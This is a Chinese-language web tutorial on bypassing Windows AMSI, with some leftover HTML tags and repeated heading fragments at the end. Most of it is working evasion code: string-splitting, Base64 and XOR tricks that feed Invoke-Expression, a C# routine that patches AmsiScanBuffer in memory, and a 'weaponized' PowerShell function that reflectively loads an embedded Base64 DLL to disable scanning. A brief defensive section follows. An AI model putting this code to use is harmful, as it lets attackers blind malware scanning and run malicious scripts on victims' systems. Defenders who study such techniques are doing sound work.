AMSI绕过技术详解与实战指南<\/h1>

1. AMSI概述<\/h2>
AMSI（Anti Malware Scan Interface，反恶意软件扫描接口）是Windows提供的一种安全机制，主要用于：<\/p>
扫描、检测和阻止恶意行为<\/li>
影响PowerShell脚本执行（从v3.0开始）<\/li>
拦截已知的公开渗透测试脚本（如Nishang、Empire、PowerSploit等）<\/li> <\/ul>
2. AMSI工作原理<\/h2>
AMSI采用"基于字符串"的检测机制，通过识别特定关键字来判断PowerShell代码是否为恶意代码。例如：<\/p>
直接检测"amsiutils"等敏感字符串<\/li>
对脚本内容进行静态分析<\/li> <\/ul>
3. 基础绕过技术<\/h2>

3.1 字符串分割<\/h3>
将被禁用的字符串分割成多个部分，运行时再拼接：<\/p>
$str = "ams"<\/span> + "iutils"<\/span>
<\/span><\/span><\/code><\/pre>3.2 Base64编码<\/h3>
$encoded = [Convert]<\/span>::ToBase64String([Text.Encoding]<\/span>::Unicode.GetBytes("恶意代码"<\/span>))
<\/span><\/span>$decoded = [Text.Encoding]<\/span>::Unicode.GetString([Convert]<\/span>::FromBase64String($encoded))
<\/span><\/span>Invoke-Expression $decoded
<\/span><\/span><\/code><\/pre>3.3 XOR加密<\/h3>
# 示例XOR加密函数<\/span>
<\/span><\/span>function<\/span> XOR-EncryptDecrypt {
<\/span><\/span>    param<\/span>([string]<\/span>$data, [int]<\/span>$key)
<\/span><\/span>    $result = ""<\/span>
<\/span><\/span>    $data.ToCharArray() | % { $result += [char]<\/span>([byte][char]<\/span>$_ -bxor<\/span> $key) }
<\/span><\/span>    return<\/span> $result
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$encrypted = XOR-EncryptDecrypt -data "恶意代码"<\/span> -key 42
<\/span><\/span>$decrypted = XOR-EncryptDecrypt -data $encrypted -key 42
<\/span><\/span>Invoke-Expression $decrypted
<\/span><\/span><\/code><\/pre>4. 内存补丁技术（完全禁用AMSI）<\/h2>
4.1 技术原理<\/h3>
通过修改amsi.dll中关键函数AmsiScanBuffer的内存内容，使其失效。<\/p>
4.2 C#实现代码<\/h3>
using<\/span> System;
<\/span><\/span>using<\/span> System.Runtime.InteropServices;
<\/span><\/span>
<\/span><\/span>namespace<\/span> Bypass
<\/span><\/span>{
<\/span><\/span>    public<\/span> class<\/span> AMSI<\/span>
<\/span><\/span>    {
<\/span><\/span>        [DllImport("kernel32")]<\/span>
<\/span><\/span>        public<\/span> static<\/span> extern<\/span> IntPtr GetProcAddress(IntPtr hModule, string<\/span> procName);
<\/span><\/span>        
<\/span><\/span><\/span>        [DllImport("kernel32")]<\/span>
<\/span><\/span>        public<\/span> static<\/span> extern<\/span> IntPtr LoadLibrary(string<\/span> name);
<\/span><\/span>        
<\/span><\/span><\/span>        [DllImport("kernel32")]<\/span>
<\/span><\/span>        public<\/span> static<\/span> extern<\/span> bool<\/span> VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint<\/span> flNewProtect, out<\/span> uint<\/span> lpflOldProtect);
<\/span><\/span>        
<\/span><\/span><\/span>        [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]<\/span>
<\/span><\/span>        static<\/span> extern<\/span> void<\/span> MoveMemory(IntPtr dest, IntPtr src, int<\/span> size);
<\/span><\/span>
<\/span><\/span>        public<\/span> static<\/span> int<\/span> Disable()
<\/span><\/span>        {
<\/span><\/span>            IntPtr TargetDLL = LoadLibrary("amsi.dll"<\/span>);
<\/span><\/span>            if<\/span> (TargetDLL == IntPtr.Zero)
<\/span><\/span>            {
<\/span><\/span>                Console.WriteLine("ERROR: Could not retrieve amsi.dll pointer."<\/span>);
<\/span><\/span>                return<\/span> 1<\/span>;
<\/span><\/span>            }
<\/span><\/span>
<\/span><\/span>            IntPtr AmsiScanBufferPtr = GetProcAddress(TargetDLL, "AmsiScanBuffer"<\/span>);
<\/span><\/span>            if<\/span> (AmsiScanBufferPtr == IntPtr.Zero)
<\/span><\/span>            {
<\/span><\/span>                Console.WriteLine("ERROR: Could not retrieve AmsiScanBuffer function pointer"<\/span>);
<\/span><\/span>                return<\/span> 1<\/span>;
<\/span><\/span>            }
<\/span><\/span>
<\/span><\/span>            UIntPtr dwSize = (UIntPtr)5<\/span>;
<\/span><\/span>            uint<\/span> Zero = 0<\/span>;
<\/span><\/span>            if<\/span> (!VirtualProtect(AmsiScanBufferPtr, dwSize, 0x40<\/span>, out<\/span> Zero))
<\/span><\/span>            {
<\/span><\/span>                Console.WriteLine("ERROR: Could not change AmsiScanBuffer memory permissions!"<\/span>);
<\/span><\/span>                return<\/span> 1<\/span>;
<\/span><\/span>            }
<\/span><\/span>
<\/span><\/span>            Byte[] Patch = { 0x31<\/span>, 0xff<\/span>, 0x90<\/span> };
<\/span><\/span>            IntPtr unmanagedPointer = Marshal.AllocHGlobal(3<\/span>);
<\/span><\/span>            Marshal.Copy(Patch, 0<\/span>, unmanagedPointer, 3<\/span>);
<\/span><\/span>            MoveMemory(AmsiScanBufferPtr + 0x001b<\/span>, unmanagedPointer, 3<\/span>);
<\/span><\/span>            
<\/span><\/span>            Console.WriteLine("AmsiScanBuffer patch has been applied."<\/span>);
<\/span><\/span>            return<\/span> 0<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.3 使用步骤<\/h3>

将上述代码编译为DLL<\/li>
在PowerShell中加载并执行：<\/li>
<\/ol>
[Reflection.Assembly]<\/span>::Load([Convert]<\/span>::FromBase64String("TVqQAAMAAAAEAAAA..."<\/span>)) | Out-Null
<\/span><\/span>[Bypass.AMSI]<\/span>::Disable()
<\/span><\/span><\/code><\/pre>5. PowerShell武器化实现<\/h2>
5.1 完整绕过脚本<\/h3>
function<\/span> Bypass-AMSI {
<\/span><\/span>    if<\/span>(-not<\/span> ([System.Management.Automation.PSTypeName]<\/span>"Bypass.AMSI"<\/span>).Type) {
<\/span><\/span>        [Reflection.Assembly]<\/span>::Load([Convert]<\/span>::FromBase64String("TVqQAAMAAAAEAAAA\/\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0FNU0kAbXNjb3JsaWIAc3JjAERpc2FibGUAUnVudGltZUZpZWxkSGFuZGxlAENvbnNvbGUAaE1vZHVsZQBwcm9jTmFtZQBuYW1lAFdyaXRlTGluZQBWYWx1ZVR5cGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBkd1NpemUAc2l6ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEFsbG9jSEdsb2JhbABNYXJzaGFsAEtlcm5lbDMyLmRsbABCeXBhc3NBTVNJLmRsbABTeXN0ZW0AU3lzdGVtLlJlZmxlY3Rpb24Ab3BfQWRkaXRpb24AWmVybwAuY3RvcgBVSW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBSdW50aW1lSGVscGVycwBCeXBhc3MAR2V0UHJvY0FkZHJlc3MAbHBBZGRyZXNzAE9iamVjdABscGZsT2xkUHJvdGVjdABWaXJ0dWFsUHJvdGVjdABmbE5ld1Byb3RlY3QAb3BfRXhwbGljaXQAZGVzdABJbml0aWFsaXplQXJyYXkAQ29weQBMb2FkTGlicmFyeQBSdGxNb3ZlTWVtb3J5AG9wX0VxdWFsaXR5AAAAABFhAG0AcwBpAC4AZABsAGwAAFdFAFIAUgBPAFIAOgAgAEMAbwB1AGwAZAAgAG4AbwB0ACAAcgBlAHQAcgBpAGUAdgBlACAAYQBtAHMAaQAuAGQAbABsACAAcABvAGkAbgB0AGUAcgAuAAAdQQBtAHMAaQBTAGMAYQBuAEIAdQBmAGYAZQByAABzRQBSAFIATwBSADoAIABDAG8AdQBsAGQAIABuAG8AdAAgAHIAZQB0AHIAaQBlAHYAZQAgAEEAbQBzAGkAUwBjAGEAbgBCAHUAZgBmAGUAcgAgAGYAdQBuAGMAdABpAG8AbgAgAHAAbwBpAG4AdABlAHIAAHVFAFIAUgBPAFIAOgAgAEMAbwB1AGwAZAAgAG4AbwB0ACAAYwBoAGEAbgBnAGUAIABBAG0AcwBpAFMAYwBhAG4AQgB1AGYAZgBlAHIAIABtAGUAbQBvAHIAeQAgAHAAZQByAG0AaQBzAHMAaQBvAG4AcwAhAABNQQBtAHMAaQBTAGMAYQBuAEIAdQBmAGYAZQByACAAcABhAHQAYwBoACAAaABhAHMAIABiAGUAZQBuACAAYQBwAHAAbABpAGUAZAAuAAAAAABNy6E5KHzvRJzwgzKCw\/hXAAQgAQEIAyAAAQUgAQEREQQgAQEOBCABAQIHBwUYGBkJGAIGGAUAAgIYGAQAAQEOBAABGQsHAAIBEmERZQQAARgICAAEAR0FCBgIBQACGBgICLd6XFYZNOCJAwYREAUAAhgYDgQAARgOCAAEAhgZCRAJBgADARgYCAMAAAgIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAADwEACkJ5cGFzc0FNU0kAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMTgAACkBACQ4Y2ExNGM0OS02NDRiLTQwY2YtYjFjNy1hNWJkYWViMGIyY2EAAAwBAAcxLjAuMC4wAABNAQAcLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUuMgEAVA4URnJhbWV3b3JrRGlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC41LjIEAQAAAAAAAAAAAN3BR94AAAAAAgAAAGUAAAAMLAAADA4AAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAABSU0RTac9x8RJ6SEet9F+qmVae0gEAAABDOlxVc2Vyc1xhbmRyZVxzb3VyY2VccmVwb3NcQnlwYXNzQU1TSVxCeXBhc3NBTVNJXG9ialxSZWxlYXNlXEJ5cGFzc0FNU0kucGRiAJksAAAAAAAAAAAAALMsAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAClLAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAAAAAD\/JQAgABAx\/5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAAAsAwAAAAAAAAAAAAAsAzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv\/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEjAIAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAaAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0AbQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAAD4ACwABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABCAHkAcABhAHMAcwBBAE0AUwBJAAAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAA+AA8AAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEIAeQBwAGEAcwBzAEEATQBTAEkALgBkAGwAbAAAAAAASAASAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQAIACpACAAIAAyADAAMQA4AAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAAAABGAA8AAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQgB5AHAAYQBzAHMAQQBNAFMASQAuAGQAbABsAAAAAAA2AAsAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEIAeQBwAGEAcwBzAEEATQBTAEkAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAAMg8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="<\/span>)) | Out-Null
<\/span><\/span>        Write-Output "DLL has been reflected"<\/span>
<\/span><\/span>    }
<\/span><\/span>    [Bypass.AMSI]<\/span>::Disable()
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>5.2 脚本特点<\/h3>

完全内存加载，不接触磁盘<\/li>
使用Base64编码隐藏DLL内容<\/li>
执行后可以自由运行任何PowerShell脚本<\/li>
<\/ul>
6. 防御措施<\/h2>
6.1 检测方法<\/h3>

监控amsi.dll内存修改行为<\/li>
检查PowerShell进程中的异常内存操作<\/li>
审计反射加载的.NET程序集<\/li>
<\/ul>
6.2 防护建议<\/h3>

启用PowerShell脚本块日志记录<\/li>
实施约束语言模式<\/li>
使用AMSI提供程序增强检测能力<\/li>
定期更新AMSI签名数据库<\/li>
<\/ul>
7. 总结<\/h2>
本文详细介绍了AMSI绕过技术，重点包括：<\/p>

基础字符串混淆技术（分割、编码、加密）<\/li>
内存补丁技术原理与实现<\/li>
武器化的PowerShell绕过脚本<\/li>
防御检测建议<\/li>
<\/ol>
这些技术展示了攻击者如何绕过AMSI保护执行恶意代码，同时也强调了加强防御措施的重要性。<\/p>
AMSI绕过技术详解与实战指南<\/h1>

3. 基础绕过技术<\/h2>

4. 内存补丁技术（完全禁用AMSI）<\/h2>

4.1 技术原理<\/h3> 通过修改amsi.dll中关键函数AmsiScanBuffer的内存内容，使其失效。<\/p>

5. PowerShell武器化实现<\/h2>

6. 防御措施<\/h2>

4.1 技术原理<\/h3>
通过修改amsi.dll中关键函数AmsiScanBuffer的内存内容，使其失效。<\/p>
